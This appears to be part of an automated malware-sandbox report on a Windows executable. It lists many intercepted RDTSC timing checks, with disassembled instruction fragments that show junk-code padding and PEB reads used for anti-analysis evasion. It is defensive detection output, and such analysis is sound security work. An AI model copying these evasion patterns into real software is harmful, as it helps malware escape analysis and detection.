Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D4EAA2 second address: D4EAAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D42EBE second address: D42EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FBCB0ED65F6h 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CD6D second address: D5CD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5C8E6 second address: D5C902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6606h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5C902 second address: D5C90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007FBCB0E4CF66h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CAA2 second address: D5CAA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: D5CAA8 second address: D5CAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FBCB0E4CF78h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A082 second address: E2A0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBCB0ED6609h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0A5 second address: E2A0AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0AA second address: E2A0C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FBCB0ED65FCh 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2A0C0 second address: E2A0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E28F12 second address: E28F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2905C second address: E29077 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBCB0E4CF72h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29077 second address: E290AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBCB0ED65FEh 0x0000000b jmp 00007FBCB0ED65FFh 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 push ebx 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jne 00007FBCB0ED65F6h 0x00000021 push edi 0x00000022 pop edi 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29200 second address: E2920F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBCB0E4CF66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2920F second address: E29217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E297ED second address: E2981B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FBCB0E4CF70h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FBCB0E4CF70h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2981B second address: E29825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBCB0ED65F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29825 second address: E29829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29829 second address: E29831 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29AED second address: E29AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007FBCB0E4CF66h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C34 second address: E29C38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C38 second address: E29C40 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C40 second address: E29C46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C46 second address: E29C50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FBCB0E4CF66h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C50 second address: E29C54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C54 second address: E29C64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C64 second address: E29C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29C68 second address: E29C81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF75h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29DD1 second address: E29DD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E29DD7 second address: E29DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2B825 second address: E2B82B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: E2B82B second address: E2B846 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FBCB0E4CF66h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120064 second address: 7120068 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120068 second address: 712006E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712006E second address: 71200AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000030h] 0x0000000e jmp 00007FBCB0ED6603h 0x00000013 sub esp, 18h 0x00000016 pushad 0x00000017 mov esi, 18FC554Bh 0x0000001c movzx esi, di 0x0000001f popad 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FBCB0ED65FFh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200AE second address: 71200B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200B5 second address: 71200EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, eax 0x0000000f pushfd 0x00000010 jmp 00007FBCB0ED6606h 0x00000015 and ecx, 3E086FE8h 0x0000001b jmp 00007FBCB0ED65FBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71200EE second address: 7120106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBCB0E4CF74h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120106 second address: 712017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebx, dword ptr [eax+10h] 0x0000000e jmp 00007FBCB0ED6606h 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBCB0ED65FEh 0x0000001b adc cx, 27D8h 0x00000020 jmp 00007FBCB0ED65FBh 0x00000025 popfd 0x00000026 mov dh, ah 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b movzx eax, di 0x0000002e push edx 0x0000002f call 00007FBCB0ED6608h 0x00000034 pop esi 0x00000035 pop edi 0x00000036 popad 0x00000037 xchg eax, esi 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b mov si, CFB9h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712017E second address: 71201B6 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov bx, ax 0x0000000a popad 0x0000000b mov esi, dword ptr [775606ECh] 0x00000011 jmp 00007FBCB0E4CF6Ch 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBCB0E4CF77h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201B6 second address: 71201F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, bx 0x00000006 pushfd 0x00000007 jmp 00007FBCB0ED65FBh 0x0000000c xor cl, FFFFFFBEh 0x0000000f jmp 00007FBCB0ED6609h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007FBCB0ED7473h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201F3 second address: 71201F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71201F7 second address: 7120281 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FBCB0ED6605h 0x0000000c add ax, 17A6h 0x00000011 jmp 00007FBCB0ED6601h 0x00000016 popfd 0x00000017 popad 0x00000018 xchg eax, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FBCB0ED6603h 0x00000022 adc cl, FFFFFFDEh 0x00000025 jmp 00007FBCB0ED6609h 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007FBCB0ED6600h 0x00000031 add al, FFFFFFD8h 0x00000034 jmp 00007FBCB0ED65FBh 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120378 second address: 712037C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712037C second address: 7120382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120382 second address: 71203C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, dx 0x00000006 push edi 0x00000007 pop esi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movzx ecx, di 0x00000010 mov dh, 09h 0x00000012 popad 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FBCB0E4CF76h 0x0000001b or si, DD08h 0x00000020 jmp 00007FBCB0E4CF6Bh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71203C3 second address: 712046B instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [eax] 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBCB0ED65FDh 0x00000011 sub ecx, 29EEE826h 0x00000017 jmp 00007FBCB0ED6601h 0x0000001c popfd 0x0000001d call 00007FBCB0ED6600h 0x00000022 pushfd 0x00000023 jmp 00007FBCB0ED6602h 0x00000028 or esi, 1F993CF8h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 pop eax 0x00000035 popad 0x00000036 mov eax, dword ptr fs:[00000030h] 0x0000003c jmp 00007FBCB0ED65FFh 0x00000041 push dword ptr [eax+18h] 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushfd 0x00000048 jmp 00007FBCB0ED6602h 0x0000004d sub eax, 2D2A8688h 0x00000053 jmp 00007FBCB0ED65FBh 0x00000058 popfd 0x00000059 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712046B second address: 712048B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov dh, al 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712048B second address: 712048F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204A2 second address: 71204A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204A6 second address: 71204B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204B8 second address: 71204D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov ax, dx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204D1 second address: 71204D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204D6 second address: 71204F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0E4CF6Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 99C0h 0x00000012 mov di, 91ECh 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71204F2 second address: 7120559 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007FBCB0ED65FCh 0x0000000b adc esi, 6CD43008h 0x00000011 jmp 00007FBCB0ED65FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FBD21295785h 0x00000020 pushad 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FBCB0ED6602h 0x00000028 add esi, 48485268h 0x0000002e jmp 00007FBCB0ED65FBh 0x00000033 popfd 0x00000034 mov edx, eax 0x00000036 popad 0x00000037 push ecx 0x00000038 mov al, dh 0x0000003a pop ecx 0x0000003b popad 0x0000003c mov eax, 00000000h 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120559 second address: 712055D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712055D second address: 7120563 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120563 second address: 7120569 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120569 second address: 712056D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712056D second address: 712060D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a pushad 0x0000000b pushad 0x0000000c call 00007FBCB0E4CF6Eh 0x00000011 pop ecx 0x00000012 pushfd 0x00000013 jmp 00007FBCB0E4CF6Bh 0x00000018 xor cl, FFFFFFBEh 0x0000001b jmp 00007FBCB0E4CF79h 0x00000020 popfd 0x00000021 popad 0x00000022 call 00007FBCB0E4CF70h 0x00000027 push eax 0x00000028 pop ebx 0x00000029 pop esi 0x0000002a popad 0x0000002b mov dword ptr [esi+04h], eax 0x0000002e pushad 0x0000002f pushad 0x00000030 jmp 00007FBCB0E4CF79h 0x00000035 push ecx 0x00000036 pop ebx 0x00000037 popad 0x00000038 mov cx, D673h 0x0000003c popad 0x0000003d mov dword ptr [esi+08h], eax 0x00000040 pushad 0x00000041 movzx esi, bx 0x00000044 push eax 0x00000045 push edx 0x00000046 call 00007FBCB0E4CF77h 0x0000004b pop ecx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712060D second address: 7120696 instructions: 0x00000000 rdtsc 0x00000002 mov bh, E4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esi+0Ch], eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FBCB0ED65FEh 0x00000011 or si, 73D8h 0x00000016 jmp 00007FBCB0ED65FBh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007FBCB0ED6608h 0x00000022 sub ah, 00000038h 0x00000025 jmp 00007FBCB0ED65FBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+4Ch] 0x0000002f jmp 00007FBCB0ED6606h 0x00000034 mov dword ptr [esi+10h], eax 0x00000037 jmp 00007FBCB0ED6600h 0x0000003c mov eax, dword ptr [ebx+50h] 0x0000003f pushad 0x00000040 mov bl, ch 0x00000042 push ebx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120696 second address: 71206AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esi+14h], eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBCB0E4CF6Eh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206AF second address: 71206F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FBCB0ED6607h 0x0000000b sbb esi, 70B71B6Eh 0x00000011 jmp 00007FBCB0ED6609h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [ebx+54h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206F8 second address: 71206FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71206FE second address: 7120704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120704 second address: 7120708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120708 second address: 7120784 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FBCB0ED6606h 0x00000012 adc esi, 018CA148h 0x00000018 jmp 00007FBCB0ED65FBh 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [ebx+58h] 0x00000022 jmp 00007FBCB0ED6605h 0x00000027 mov dword ptr [esi+1Ch], eax 0x0000002a pushad 0x0000002b pushad 0x0000002c mov bh, ah 0x0000002e mov ebx, 0C3D1E4Ah 0x00000033 popad 0x00000034 mov al, bh 0x00000036 popad 0x00000037 mov eax, dword ptr [ebx+5Ch] 0x0000003a jmp 00007FBCB0ED65FAh 0x0000003f mov dword ptr [esi+20h], eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007FBCB0ED65FAh 0x0000004b rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 7120784 second address: 712078A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 712078A second address: 71207C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBCB0ED65FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+60h] 0x0000000c jmp 00007FBCB0ED6600h 0x00000011 mov dword ptr [esi+24h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FBCB0ED65FAh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207C0 second address: 71207C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207C4 second address: 71207CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207CA second address: 71207D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D0 second address: 71207D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PqHnYMj5eF.exeRDTSC instruction interceptor: First address: 71207D4 second address: 71207D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
